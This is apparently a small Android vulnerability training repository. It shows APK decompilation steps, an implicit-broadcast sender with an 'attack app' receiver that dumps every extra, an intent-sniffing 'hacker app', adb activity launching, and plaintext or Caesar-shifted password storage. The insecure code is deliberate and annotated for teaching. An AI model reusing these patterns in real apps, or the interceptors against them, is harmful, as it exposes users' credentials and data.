├── APKExtract.txt ├── BroadcastReceiver.txt ├── Capability leak.txt ├── README.md ├── Storage.txt ├── activitiesAccess.txt └── intent.txt /APKExtract.txt: -------------------------------------------------------------------------------- 1 | /* 2 | Convert Android Apk to source code 3 | */ 4 | 5 | options 6 | 1- change the .APK file extension to .ZIP and extract it 7 | 2- use APK tool 8 | http://ibotpeaches.github.io/Apktool/ 9 | 3- Convert APK to source code using dex2jar 10 | https://sourceforge.net/projects/dex2jar/files/ 11 | 12 | Run this command to convert the .APK to a .JAR 13 | Mac 14 | ./d2j-dex2jar.sh -f -o output_jar.jar file.apk 15 | Windows 16 | d2j-dex2jar.bat file.apk 17 | 18 | 19 | 20 | IDE to view the source in the .JAR file 21 | http://jd.benow.ca 22 | 23 | 24 | 4- Get the APK of a Play Store app (third-party mirror: check the APK's signing certificate before trusting the file) 25 | https://apkpure.com -------------------------------------------------------------------------------- /BroadcastReceiver.txt: -------------------------------------------------------------------------------- 1 | /* 2 | attack on BroadcastReceiver Android 3 | */ 4 | 5 | 6 | 1-// normal App (vulnerable: it sends an implicit broadcast with no receiver permission, so any installed app that registers for the action can receive the extras; restrict delivery with Intent.setPackage() or a receiver permission) 7 | A- Add these lines in application tag in manifest.xml 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 19 | 20 | 21 | B- Add the service class 22 | public class ServiceNotification extends IntentService { 23 | public static boolean ServiceIsRun=false; 24 | 25 | public ServiceNotification() { 26 | super("MyWebRequestService"); 27 | } 28 | protected void onHandleIntent(Intent workIntent) { 29 | 30 | // continue sending the messages 31 | while ( ServiceIsRun) { 32 | // create new intent 33 | Intent intent = new Intent(); 34 | //set the action that will receive our broadcast 35 | intent.setAction("com.example.Broadcast"); 36 | // add data to the bundle 37 | intent.putExtra("username", "alxs1aa"); 38 | // send the data to broadcast 39 | sendBroadcast(intent); 40 | //delay for 50000ms 41 | try{ 42 | Thread.sleep(50000); 43 | }catch (Exception ex){} 44 | 45 | 46 | } 47 | } 48 | 49 | 50 | } 51 | 52 | C-Add 
BroadcastReceiver Class 53 | 54 | /** 55 | * Created by hussienalrubaye on 3/6/16. 56 | */ 57 | public class MyReceiver extends BroadcastReceiver { 58 | 59 | @Override 60 | public void onReceive(Context context, Intent intent) { 61 | // get the bundles in the message 62 | final Bundle bundle = intent.getExtras(); 63 | // check that the action equals the action we fire in the broadcast 64 | if ( intent.getAction().equalsIgnoreCase("com.example.Broadcast")) 65 | //read the data from the intent 66 | Toast.makeText(context,bundle.getString("username"),Toast.LENGTH_LONG).show(); 67 | } 68 | } 69 | //Start service from main activity 70 | // check whether the service is already running in the background 71 | if(ServiceNotification.ServiceIsRun==false ) { 72 | ServiceNotification.ServiceIsRun = true; 73 | //register the service to run in background 74 | Intent intent = new Intent(this, ServiceNotification.class); 75 | // start the service 76 | startService(intent); 77 | 78 | } 79 | 80 | 81 | 2-// attack app (a second app that registers for the same action and reads every extra; this is why the sender must limit who can receive the broadcast) 82 | A- Add these lines in application tag in manifest.xml 83 | 84 | 85 | 88 | 89 | 90 | 91 | 92 | 93 | B-Add BroadcastReceiver Class 94 | 95 | public class MyReceiver extends BroadcastReceiver { 96 | 97 | @Override 98 | public void onReceive(Context context, Intent intent) { 99 | String DataBundel=""; 100 | // get all the data sent in the bundle 101 | Bundle bundle= intent.getExtras(); 102 | //loop through all keys in the bundle 103 | for (String key : bundle.keySet()) { 104 | // get object by key (declared as Object because it may be text, an image or anything else) 105 | Object value = bundle.get(key); 106 | // append the key, its value and the value's type 107 | DataBundel+= String.format("%s %s (%s)", key, value.toString(), value.getClass().getName()); 108 | } 109 | //display notify message to the user 110 | NewMessageNotification NotifyMe=new NewMessageNotification(); 111 | NotifyMe.notify( context, DataBundel, 123); 112 | 113 | } 114 | } 115 | 116 | C- Add Notification class from (Right click on the Java package where the main 
activity is located -> New -> UI Component -> Notification), then name the class "NewMessageNotification" 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /Capability leak.txt: -------------------------------------------------------------------------------- 1 | /* 2 | Learn how to convert APK to real files 3 | */ 4 | 5 | 6 | 1- just change .APK to .ZIP and extract it. 7 | 8 | 2- use APK tool, to get your source 9 | http://ibotpeaches.github.io/Apktool/ 10 | 11 | 3- convert smali to java 12 | A- dex2jar: convert the code to a different format 13 | https://sourceforge.net/projects/dex2jar/files/ 14 | 15 | Run this command to get a .jar file from the .apk file 16 | ./d2j-dex2jar.sh -f -o output_jar.jar PATH 17 | 18 | 19 | B- IDE to view the source of the .jar 20 | http://jd.benow.ca 21 | 22 | 23 | 4-Other Project 24 | A- get an app as an APK 25 | https://apkpure.com 26 | get the APK by its package name from Google Play 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2 | # Android Vulnerability Training 3 | ### This is the snippet code for this [Android Vulnerability Youtube playlist](https://www.youtube.com/playlist?list=PLF8OvnCBlEY2f7r1Ei65-xJpet8xLYm5d) 4 | to make learning and writing the code easier 5 | -------------------------------------------------------------------------------- /Storage.txt: -------------------------------------------------------------------------------- 1 | /* 2 | store data in the app 3 | */ 4 | 5 | 6 | 1- // XML layout 7 | 8 | 12 | 13 | 18 | 19 | 24 | 25 | 31 | 32 | 33 | 34 | 39 | 40 | 45 | 46 | 52 | 53 | 54 | 55 | 56 | 57 | 2- insecure code (the user name and password are written to SharedPreferences as plain text; MODE_PRIVATE keeps other apps out, but the file can still be read on a rooted device or from a backup) 58 | // shared preferences file name 59 | public static final String MyPREFERENCES = "MyPrfLogin" ; 60 | // key for user name 61 | public static final String UserName = "UserNameKey"; 62 | // key for password 63 | public static final String 
Password = "PasswordKey"; 64 | // shared preferences instance used to access the preferences file 65 | SharedPreferences sharedpreferences; 66 | // input text name 67 | EditText etUserName; 68 | // input text password 69 | EditText etPassword; 70 | @Override 71 | protected void onCreate(Bundle savedInstanceState) { 72 | super.onCreate(savedInstanceState); 73 | setContentView(R.layout.activity_main); 74 | Toolbar toolbar = (Toolbar) findViewById(R.id.toolbar); 75 | setSupportActionBar(toolbar); 76 | // initialize user name instance with the real input in xml 77 | etUserName=(EditText)findViewById(R.id.etUserName); 78 | // initialize password instance with the real input in xml 79 | etPassword=(EditText)findViewById(R.id.etPassword); 80 | // initialize shared preferences 81 | sharedpreferences = getSharedPreferences(MyPREFERENCES, Context.MODE_PRIVATE); 82 | // access to the floating button 83 | FloatingActionButton fab = (FloatingActionButton) findViewById(R.id.fab); 84 | // listen for clicks on the floating button 85 | fab.setOnClickListener(new View.OnClickListener() { 86 | @Override 87 | public void onClick(View view) { 88 | // save data 89 | // start editing the file 90 | SharedPreferences.Editor editor = sharedpreferences.edit(); 91 | // add user name 92 | editor.putString(UserName, etUserName.getText().toString()); 93 | // add password (stored as plain text) 94 | editor.putString(Password, etPassword.getText().toString()); 95 | // save the updated data 96 | editor.commit(); 97 | //display message saved 98 | Toast.makeText(MainActivity.this, "Data is Saved", Toast.LENGTH_LONG).show(); 99 | 100 | } 101 | }); 102 | } 103 | 104 | 105 | // "secure" variant: shift the characters before storing them. NOTE: a fixed character shift (Caesar cipher) can be undone by anyone who reads the code or tries a few shift values, so it is obfuscation, not encryption; for real protection avoid storing the password, or encrypt it with a key held in the Android Keystore 106 | // shift cipher: the shift value acts as the key 107 | /* 108 | // cipher encryption add shift for key 109 | cipher(“hussein”, 10) // result “r }}osx” 110 | // cipher decryption 111 | cipher(“r }}osx”, -10) // result “hussein” 112 | */ 113 | String cipher(String msg, int shift){ 114 | String s = ""; 115 | int len = msg.length(); // get string 
length 116 | for(int x = 0; x < len; x++){ 117 | char c = (char)(msg.charAt(x) + shift); // shift every character 118 | s += c; // append the characters 119 | } 120 | return s; 121 | } 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /activitiesAccess.txt: -------------------------------------------------------------------------------- 1 | /* 2 | how to open an activity 3 | */ 4 | 1// from adb, run 5 | • ./adb shell 6 | • am start -n PackageName/.ActivityName 7 | (without root this only starts an activity that is exported; set android:exported="false" on activities that other apps must not launch) 8 | 9 | 10 | -------------------------------------------------------------------------------- /intent.txt: -------------------------------------------------------------------------------- 1 | /* 2 | how to use an intent 3 | */ 4 | 5 | 6 | 1// sender 7 | final EditText etComment=(EditText)findViewById(R.id.etComment); 8 | Intent intent=getPackageManager().getLaunchIntentForPackage("com.example.hussienalrubaye.receiver"); 9 | // put the data that we want to send over intent 10 | intent.putExtra("Comment",etComment.getText().toString());); 11 | // start another app 12 | startActivity(intent); 13 | 14 | 15 | 2// receiver 16 | 17 | 18 | TextView txtview=(TextView)findViewById(R.id.txtDisplay); 19 | 20 | // get all the data sent in the bundle 21 | Bundle b=getIntent().getExtras(); 22 | // display the value stored under the "Comment" key 23 | txtview.setText(b.getString("Comment")); 24 | 25 | 3- hacker app 26 | 27 | TextView txtDisplay=(TextView)findViewById(R.id.txtDisplay); 28 | String DataBundel=""; 29 | // get all the data sent in the bundle 30 | Bundle bundle=getIntent().getExtras(); 31 | //loop through all keys in the bundle 32 | for (String key : bundle.keySet()) { 33 | // get object by key (declared as Object because it may be text, an image or anything else) 34 | Object value = bundle.get(key); 35 | // append the key, its value and the value's type 36 | DataBundel+= String.format("%s %s (%s)", key, value.toString(), value.getClass().getName()); 37 | } 38 | txtDisplay.setText(DataBundel); 39 | 40 | 
--------------------------------------------------------------------------------